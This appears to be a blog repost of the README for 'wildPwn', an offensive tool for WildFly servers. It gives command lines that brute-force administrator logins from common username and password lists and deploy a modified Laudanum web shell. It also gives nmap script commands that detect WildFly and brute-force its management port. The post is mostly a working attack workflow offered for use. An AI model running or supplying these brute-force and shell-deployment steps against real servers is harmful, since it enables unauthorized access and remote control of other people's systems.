Ads Top

wildPwn - WildFly Exploitation Tool

It is a tool for WildFly. Tool can be used to brute force or shell deploy. wildPwn.war contains modified Laudanum Shell. userList.txt contains common usernames and passList.txt contains common passwords.


Usage

Bruteforce
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST> 
Shell Deploy
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>

Video

PoC Video

Nmap Scripts

Detection
nmap --script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>
Powered by Blogger.